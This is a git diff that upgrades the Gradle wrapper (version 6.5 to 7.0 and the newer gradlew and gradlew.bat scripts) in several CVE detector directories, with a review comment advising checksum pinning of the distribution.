b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20171000353/gradlew b/google/detectors/rce/cve20171000353/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20171000353/gradlew +++ b/google/detectors/rce/cve20171000353/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
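Review bot: The bumped `distributionUrl` in `cve20171000353/gradle/wrapper/gradle-wrapper.properties` is not pinned by a checksum. The hunk adds `networkTimeout=10000` and `validateDistributionUrl=true`, neither of which checks the content of the downloaded archive, so I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip>` directly below `distributionUrl`, with the value taken from Gradle's published release checksums. The identical properties hunks for `cve20175638` and `cve20179805` later in this diff need the same line. `gradle-wrapper.jar` also changes as an opaque binary in each of these directories, so its hash should be compared against Gradle's published wrapper checksums before merge, ideally by a wrapper-validation step in CI.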
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20171000353/gradlew.bat b/google/detectors/rce/cve20171000353/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20171000353/gradlew.bat +++ b/google/detectors/rce/cve20171000353/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/cve20175638/gradlew b/google/detectors/rce/cve20175638/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20175638/gradlew +++ b/google/detectors/rce/cve20175638/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20175638/gradlew.bat b/google/detectors/rce/cve20175638/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20175638/gradlew.bat +++ b/google/detectors/rce/cve20175638/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
